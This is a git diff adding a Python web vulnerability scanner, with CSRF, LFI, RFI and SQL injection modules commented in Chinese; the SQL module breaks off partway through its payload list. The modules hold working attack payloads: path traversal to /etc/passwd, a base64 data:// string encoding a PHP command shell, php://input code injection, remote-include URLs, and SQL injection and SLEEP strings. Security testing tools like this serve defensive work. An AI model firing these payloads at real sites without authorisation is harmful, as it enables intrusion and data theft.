index 0000000..0dd5c88
--- /dev/null
+++ b/xss_scanner/requirements.txt
@@ -0,0 +1,17 @@
+requests>=2.28.0
+beautifulsoup4>=4.11.0
+lxml>=4.9.0
+selenium>=4.3.0
+urllib3>=1.26.9
+colorama>=0.4.5
+tqdm>=4.64.0
+argparse>=1.4.0
+python-dotenv>=0.20.0
+cssselect>=1.1.0
+webdriver-manager>=3.8.0
+dnspython>=2.2.1
+pycurl>=7.45.1
+flask>=2.1.2
+pyOpenSSL>=22.0.0
+cryptography>=37.0.2
+html2text>=2020.1.16 
\ No newline at end of file
diff --git a/xss_scanner/scanners/__init__.py b/xss_scanner/scanners/__init__.py
new file mode 100644
index 0000000..483c699
--- /dev/null
+++ b/xss_scanner/scanners/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 扫描器模块包""" 
\ No newline at end of file
diff --git a/xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc b/xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..275ae0b
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc
new file mode 100644
index 0000000..bbbc084
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/lfi_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/lfi_scanner.cpython-313.pyc
new file mode 100644
index 0000000..57a7983
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/lfi_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/rfi_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/rfi_scanner.cpython-313.pyc
new file mode 100644
index 0000000..ecb38ed
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/rfi_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc
new file mode 100644
index 0000000..7c34e35
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc
new file mode 100644
index 0000000..4a980aa
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/xss_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/xss_scanner.cpython-313.pyc
new file mode 100644
index 0000000..a82bda9
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/xss_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/xxe_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/xxe_scanner.cpython-313.pyc
new file mode 100644
index 0000000..5335ac6
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/xxe_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/csrf_scanner.py b/xss_scanner/scanners/csrf_scanner.py
new file mode 100644
index 0000000..aae4c9e
--- /dev/null
+++ b/xss_scanner/scanners/csrf_scanner.py
@@ -0,0 +1,194 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+CSRF扫描器模块，负责扫描CSRF漏洞
+"""
+
+import re
+import logging
+import random
+import string
+from urllib.parse import urlparse, urljoin
+from bs4 import BeautifulSoup
+
+logger = logging.getLogger('xss_scanner')
+
+class CSRFScanner:
+    """CSRF扫描器类，负责扫描CSRF漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化CSRF扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 敏感操作关键词
+        self.sensitive_keywords = [
+            'user', 'account', 'profile', 'password', 'email', 'settings',
+            'admin', 'create', 'delete', 'remove', 'update', 'edit', 'modify',
+            'register', 'signup', 'login', 'logout', 'authenticate', 'auth',
+            'transfer', 'payment', 'pay', 'fund', 'money', 'order', 'checkout',
+            'purchase', 'buy', 'shop', 'cart', 'add', 'submit', 'confirm',
+            'upload', 'download', 'send', 'message', 'post', 'comment', 'reply',
+            'subscribe', 'unsubscribe', 'membership', 'join', 'leave'
+        ]
+        
+        # CSRF令牌常见名称
+        self.csrf_token_names = [
+            'csrf', 'xsrf', 'token', '_token', 'authenticity_token',
+            'csrf_token', 'xsrf_token', 'security_token', 'request_token',
+            'csrf-token', 'xsrf-token', 'anti-csrf', 'anti-xsrf',
+            '__RequestVerificationToken', '_csrf', '_xsrf', 'csrfmiddlewaretoken'
+        ]
+    
+    def scan_form(self, url, form, field=None):
+        """
+        扫描表单中的CSRF漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 表单字段（对CSRF扫描不需要）
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 如果是GET方法表单，则不检查CSRF
+        if form['method'].upper() == 'GET':
+            return None
+            
+        # 检查表单是否包含敏感操作关键词
+        form_action = form['action'].lower()
+        form_is_sensitive = any(keyword in form_action for keyword in self.sensitive_keywords)
+        
+        # 检查表单字段名称是否包含敏感关键词
+        for field in form.get('fields', []):
+            if field.get('name') and any(keyword in field['name'].lower() for keyword in self.sensitive_keywords):
+                form_is_sensitive = True
+                break
+                
+        # 如果表单不包含敏感操作，则不检查CSRF
+        if not form_is_sensitive:
+            return None
+            
+        logger.debug(f"扫描CSRF: {form['action']} @ {url}")
+        
+        # 检查表单是否包含CSRF令牌
+        has_csrf_token = False
+        token_field = None
+        
+        for field in form.get('fields', []):
+            field_name = field.get('name', '').lower()
+            
+            # 检查字段名称是否匹配CSRF令牌常见名称
+            if any(token_name in field_name for token_name in self.csrf_token_names):
+                has_csrf_token = True
+                token_field = field['name']
+                break
+                
+        # 如果表单包含CSRF令牌，则需要进一步验证
+        if has_csrf_token:
+            # 再次请求页面，验证CSRF令牌是否会改变
+            try:
+                token_value1 = self._get_csrf_token_value(url, token_field)
+                token_value2 = self._get_csrf_token_value(url, token_field)
+                
+                # 如果两次请求的令牌值相同，则可能存在CSRF漏洞
+                if token_value1 and token_value2 and token_value1 == token_value2:
+                    return {
+                        'type': 'CSRF',
+                        'subtype': 'Static CSRF Token',
+                        'url': url,
+                        'form_action': form['action'],
+                        'form_method': form['method'],
+                        'token_field': token_field,
+                        'severity': '中',
+                        'description': f"表单使用了静态CSRF令牌，可能存在CSRF漏洞",
+                        'details': f"表单中的CSRF令牌'{token_field}'在多次请求中保持不变，这可能使得表单容易受到CSRF攻击",
+                        'recommendation': "使用动态生成的CSRF令牌，并确保令牌在会话中的唯一性"
+                    }
+            except Exception as e:
+                logger.error(f"验证CSRF令牌时发生错误: {str(e)}")
+        else:
+            # 表单不包含CSRF令牌，可能存在CSRF漏洞
+            return {
+                'type': 'CSRF',
+                'subtype': 'Missing CSRF Token',
+                'url': url,
+                'form_action': form['action'],
+                'form_method': form['method'],
+                'severity': '高',
+                'description': f"表单缺少CSRF令牌，可能存在CSRF漏洞",
+                'details': f"表单不包含CSRF令牌，这使得表单容易受到CSRF攻击",
+                'recommendation': "在所有敏感表单中添加CSRF令牌，并在服务器端验证令牌的有效性"
+            }
+            
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的CSRF漏洞（不适用于参数扫描）
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # CSRF漏洞通常与表单相关，不适用于URL参数扫描
+        return None
+    
+    def _get_csrf_token_value(self, url, token_field):
+        """
+        获取页面中CSRF令牌的值
+        
+        Args:
+            url: 页面URL
+            token_field: 令牌字段名
+            
+        Returns:
+            str: 令牌值，如果未找到则返回None
+        """
+        response = self.http_client.get(url)
+        if not response:
+            return None
+            
+        # 解析HTML
+        try:
+            soup = BeautifulSoup(response.text, 'html.parser')
+            
+            # 查找匹配的输入字段
+            input_field = soup.find('input', {'name': token_field})
+            if input_field and input_field.has_attr('value'):
+                return input_field['value']
+                
+            # 查找匹配的meta标签
+            meta_field = soup.find('meta', {'name': token_field})
+            if meta_field and meta_field.has_attr('content'):
+                return meta_field['content']
+                
+            # 查找匹配的JavaScript变量（简单实现，可能不适用于所有情况）
+            script_tags = soup.find_all('script')
+            for script in script_tags:
+                if script.string and token_field in script.string:
+                    # 简单的正则表达式匹配
+                    match = re.search(f"{token_field}['\"]?\\s*[:=]\\s*['\"]([^'\"]+)['\"]", script.string)
+                    if match:
+                        return match.group(1)
+        except Exception as e:
+            logger.error(f"获取CSRF令牌时发生错误: {str(e)}")
+            
+        return None
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return False 
\ No newline at end of file
diff --git a/xss_scanner/scanners/lfi_scanner.py b/xss_scanner/scanners/lfi_scanner.py
new file mode 100644
index 0000000..e2d8636
--- /dev/null
+++ b/xss_scanner/scanners/lfi_scanner.py
@@ -0,0 +1,331 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+LFI（本地文件包含）扫描器模块，负责扫描LFI漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import os
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class LFIScanner:
+    """LFI扫描器类，负责扫描本地文件包含漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化LFI扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # LFI检测Payload
+        self.payloads = [
+            # 基本路径遍历
+            "../../../../../../../etc/passwd",
+            "../../../../../../etc/passwd",
+            "../../../../../etc/passwd",
+            "../../../../etc/passwd",
+            "../../../etc/passwd",
+            "../../etc/passwd",
+            "../etc/passwd",
+            
+            # Windows系统文件
+            "../../../../../../../windows/win.ini",
+            "../../../../../../windows/win.ini",
+            "../../../../../windows/win.ini",
+            "../../../../windows/win.ini",
+            "../../../windows/win.ini",
+            "../../windows/win.ini",
+            "../windows/win.ini",
+            
+            # URL编码绕过
+            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
+            "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+            "%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd",
+            
+            # 空字节截断 (仅适用于某些PHP版本)
+            "../../../../../../../etc/passwd%00",
+            "../../../../../../../etc/passwd\0",
+            
+            # 双重URL编码
+            "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd",
+            
+            # 使用斜杠绕过
+            "....//....//....//etc/passwd",
+            "..././..././..././etc/passwd",
+            
+            # 使用过滤器包装器 (PHP)
+            "php://filter/convert.base64-encode/resource=/etc/passwd",
+            "php://filter/read=convert.base64-encode/resource=/etc/passwd",
+            "php://input",
+            "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ZWNobyAiU3VjY2VzcyI7Pz4=",
+            "expect://id",
+            
+            # 使用伪协议
+            "file:///etc/passwd",
+            "file:///../../../etc/passwd",
+            
+            # 路径参数污染
+            "file.php?path=/etc/passwd",
+            "file.php?path=../../../etc/passwd",
+            
+            # 向后兼容绕过
+            "/..././..././..././etc/passwd",
+            
+            # 绝对路径
+            "/etc/passwd",
+            "c:\\windows\\win.ini",
+            
+            # 嵌套的遍历序列
+            "....//....//....//etc/passwd",
+            "../....//....//etc/passwd",
+            
+            # 特殊字符绕过
+            "..%252f..%252f..%252fetc%252fpasswd",
+            
+            # Null字节混淆
+            "../../../etc/passwd%00.jpg",
+            "../../../etc/passwd\0.jpg",
+            
+            # Unicode / UTF-8编码
+            "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
+            "%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd"
+        ]
+        
+        # LFI成功检测模式
+        self.unix_patterns = [
+            # /etc/passwd文件内容特征
+            "root:.*:0:0:",
+            "bin:.*:1:1:",
+            "daemon:.*:2:2:",
+            "ftpuser:.*:.",
+            "rsh",
+            "ssh",
+            ".*usr.*bin.*\n"
+        ]
+        
+        self.windows_patterns = [
+            # Windows系统文件特征
+            "\\[extensions\\]",
+            "\\[mci extensions\\]",
+            "\\[fonts\\]",
+            "\\[files\\]",
+            "MAPI=1",
+            "mail=",
+            "\\[Mail\\]",
+            "\\[MCI Extensions\\]"
+        ]
+        
+        # PHP错误模式 (可能表明有漏洞，但需要进一步利用)
+        self.php_error_patterns = [
+            "failed to open stream: No such file or directory",
+            "failed to open stream: Permission denied",
+            "Failed opening required",
+            "Warning: include\\(",
+            "Warning: require_once\\(",
+            "Warning: require\\(",
+            "Warning: include_once\\("
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的LFI漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在LFI的字段名称
+        lfi_prone_fields = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in lfi_prone_fields):
+            return None
+            
+        logger.debug(f"扫描LFI: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测LFI漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含文件内容特征
+                if self._check_lfi_success(response.text):
+                    return {
+                        'type': 'LFI',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现本地文件包含(LFI)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在LFI漏洞，可以读取服务器上的敏感文件",
+                        'recommendation': "避免将用户输入直接传递给文件系统操作，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描LFI时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的LFI漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在LFI的参数名称
+        lfi_prone_params = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in lfi_prone_params):
+            return None
+            
+        logger.debug(f"扫描LFI参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测LFI漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                response = self.http_client.get(test_url)
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含文件内容特征
+                if self._check_lfi_success(response.text):
+                    return {
+                        'type': 'LFI',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现本地文件包含(LFI)漏洞",
+                        'details': f"URL参数{param}存在LFI漏洞，可以读取服务器上的敏感文件",
+                        'recommendation': "避免将用户输入直接传递给文件系统操作，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描LFI参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_lfi_success(self, content):
+        """
+        检查响应内容中是否包含LFI成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含LFI成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查Unix系统文件特征
+        for pattern in self.unix_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        # 检查Windows系统文件特征
+        for pattern in self.windows_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+        
+        # 检查PHP错误信息特征
+        # 注意：这需要进一步的验证，因为错误信息可能只是表明有漏洞，但未被成功利用
+        for pattern in self.php_error_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                # 检查是否同时包含敏感信息，如路径
+                if re.search("/(var|etc|usr|opt|home)/", content):
+                    return True
+                if re.search("([A-Za-z]:\\\\|System32|Program Files)", content):
+                    return True
+                
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/rfi_scanner.py b/xss_scanner/scanners/rfi_scanner.py
new file mode 100644
index 0000000..aae50cb
--- /dev/null
+++ b/xss_scanner/scanners/rfi_scanner.py
@@ -0,0 +1,351 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+RFI（远程文件包含）扫描器模块，负责扫描RFI漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class RFIScanner:
+    """RFI扫描器类，负责扫描远程文件包含漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化RFI扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成随机标记，用于检测RFI漏洞
+        self.rfi_mark = 'RFI_' + self._generate_random_string(8)
+        
+        # RFI检测Payload
+        # 注意：在实际使用中，这些应该指向攻击者控制的服务器
+        # 出于安全考虑，这里使用的是公共可访问的测试服务
+        self.payloads = [
+            # 远程文件包含的基本测试
+            "http://example.com/rfi_test.txt",
+            "https://example.com/rfi_test.php",
+            "http://test.example.com/shell.txt",
+            
+            # 使用不同协议（实际使用中应指向攻击者控制的服务器）
+            "ftp://example.com/rfi_test.php",
+            "https://raw.githubusercontent.com/some-repo/test/master/info.php",
+            
+            # 使用端口和认证
+            "http://user:password@example.com:8080/rfi_test.php",
+            
+            # IP地址形式
+            "http://127.0.0.1/rfi_test.php",
+            "http://192.168.0.1/rfi_test.php",
+            "http://[::1]/rfi_test.php",
+            
+            # 使用单词编码
+            "http://%65%78%61%6d%70%6c%65.com/rfi_test.php",
+            
+            # URL编码绕过
+            "http%3A%2F%2Fexample.com%2Frfi_test.php",
+            
+            # 双重URL编码
+            "http%253A%252F%252Fexample.com%252Frfi_test.php",
+            
+            # 使用空字节截断（适用于某些PHP版本）
+            "http://example.com/rfi_test.php%00",
+            "http://example.com/rfi_test.php\0",
+            
+            # 使用注释截断
+            "http://example.com/rfi_test.php#",
+            "http://example.com/rfi_test.php?",
+            
+            # 使用双斜杠
+            "http://example.com//rfi_test.php",
+            
+            # 使用数据URI（PHP支持）
+            f"data://text/plain;base64,{self._encode_base64(f'<?php echo "{self.rfi_mark}"; ?>')}",
+            
+            # 使用PHP包装器
+            "php://input", 
+            
+            # 使用file://URL（仅当服务器和攻击者在同一台机器上）
+            "file:///var/www/html/rfi_test.php"
+        ]
+        
+        # 可能的RFI成功特征
+        self.success_patterns = [
+            re.escape(self.rfi_mark),  # 我们的标记
+            "root:.*:0:0:",  # 如果包含远程服务器系统文件
+            "\\<\\?php",     # PHP代码
+            "phpinfo\\(\\)", # PHP信息
+            "PHP Version",   # PHP版本信息
+            "www-data",      # Web服务用户
+            "HTTP_USER_AGENT", # PHP环境变量
+            "REMOTE_ADDR",   # PHP环境变量
+            "SERVER_ADDR",   # PHP环境变量
+            "DOCUMENT_ROOT", # PHP环境变量
+            "PATH_TRANSLATED", # PHP环境变量
+            "Warning: assert" # PHP警告
+        ]
+        
+        # PHP错误模式，可能表明存在漏洞但无法被成功利用
+        self.php_error_patterns = [
+            "failed to open stream: HTTP request failed",
+            "failed to open stream: Connection refused",
+            "failed to open stream: No such file or directory",
+            "Deprecated: Directive 'allow_url_include' is deprecated",
+            "Warning: include\\(", 
+            "Warning: remote_file_inclusion",
+            "allow_url_fopen must be enabled",
+            "allow_url_include must be enabled",
+            "Warning: include_once\\(",
+            "Failed to include '"
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的RFI漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在RFI的字段名称
+        rfi_prone_fields = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include',
+            'inc', 'locate', 'show', 'site', 'view', 'content'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in rfi_prone_fields):
+            return None
+            
+        logger.debug(f"扫描RFI: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测RFI漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 如果是data://或php://输入，需要准备额外的数据
+            post_data = None
+            if payload == "php://input":
+                post_data = f"<?php echo '{self.rfi_mark}'; ?>"
+                
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    if post_data:
+                        # 对于php://input，需要直接发送PHP代码
+                        response = self.http_client.post(action_url, data=form_data, 
+                                                         headers={"Content-Type": "application/x-www-form-urlencoded"}, 
+                                                         body=post_data)
+                    else:
+                        response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_rfi_success(response.text):
+                    return {
+                        'type': 'RFI',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现远程文件包含(RFI)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在RFI漏洞，可以执行远程服务器上的代码",
+                        'recommendation': "禁用PHP的allow_url_fopen和allow_url_include选项，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描RFI时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的RFI漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在RFI的参数名称
+        rfi_prone_params = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include',
+            'inc', 'locate', 'show', 'site', 'view', 'content'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in rfi_prone_params):
+            return None
+            
+        logger.debug(f"扫描RFI参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测RFI漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            # 如果是data://或php://输入，需要准备额外的数据
+            post_data = None
+            if payload == "php://input":
+                post_data = f"<?php echo '{self.rfi_mark}'; ?>"
+                
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                if post_data:
+                    # 对于php://input，需要直接发送PHP代码
+                    response = self.http_client.request("POST", test_url, 
+                                                       headers={"Content-Type": "application/x-www-form-urlencoded"}, 
+                                                       data=post_data)
+                else:
+                    response = self.http_client.get(test_url)
+                
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_rfi_success(response.text):
+                    return {
+                        'type': 'RFI',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现远程文件包含(RFI)漏洞",
+                        'details': f"URL参数{param}存在RFI漏洞，可以执行远程服务器上的代码",
+                        'recommendation': "禁用PHP的allow_url_fopen和allow_url_include选项，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描RFI参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_rfi_success(self, content):
+        """
+        检查响应内容中是否包含RFI成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含RFI成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查成功特征
+        for pattern in self.success_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        # 检查PHP错误信息特征，但需要进一步验证
+        for pattern in self.php_error_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                # 如果响应中包含某些服务器信息，可能表明漏洞可以被进一步利用
+                if re.search("/(var|etc|usr|opt|home)/", content):
+                    return True
+                if re.search("([A-Za-z]:\\\\|System32|Program Files)", content):
+                    return True
+                    
+        return False
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length))
+    
+    def _encode_base64(self, text):
+        """
+        Base64编码
+        
+        Args:
+            text: 要编码的文本
+            
+        Returns:
+            str: Base64编码后的字符串
+        """
+        import base64
+        return base64.b64encode(text.encode()).decode()
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/sql_injection_scanner.py b/xss_scanner/scanners/sql_injection_scanner.py
new file mode 100644
index 0000000..8efbcf4
--- /dev/null
+++ b/xss_scanner/scanners/sql_injection_scanner.py
@@ -0,0 +1,511 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SQL注入扫描器模块，负责扫描SQL注入漏洞
+"""
+
+import re
+import logging
+import time
+import random
+from difflib import SequenceMatcher
+from urllib.parse import urlparse, urlencode, parse_qsl
+
+logger = logging.getLogger('xss_scanner')
+
+class SQLInjectionScanner:
+    """SQL注入扫描器类，负责扫描SQL注入漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SQL注入扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 基本的SQL注入Payload
+        self.payloads = {
+            'error_based': [
+                "'",
+                "\"",
+                "')",
+                "'))",
+                "\")",
+                "\"))",
+                "';",
+                "\";",
+                "')) OR 1=1--",
+                "')); OR 1=1--",
+                "')) OR '1'='1'--",
+                "')) OR '1'='1'#",
+                "' OR '1'='1'--",
+                "' OR '1'='1' --",
+                "' OR '1'='1'#",
+                "' OR '1'='1' #",
+                "' OR 1=1--",
+                "' OR 1=1 --",
+                "\" OR 1=1--",
+                "\" OR 1=1 --",
+                "' OR 1=1#",
+                "\" OR 1=1#",
+                "')) UNION SELECT NULL--",
+                "')) UNION SELECT NULL, NULL--",
+                "')) UNION SELECT NULL, NULL, NULL--",
+                "' UNION SELECT NULL--",
+                "' UNION SELECT NULL, NULL--",
+                "' UNION SELECT NULL, NULL, NULL--"
+            ],
+            'time_based': [
+                "' OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\" OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "')) OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "' OR SLEEP(3)--",
+                "\" OR SLEEP(3)--",
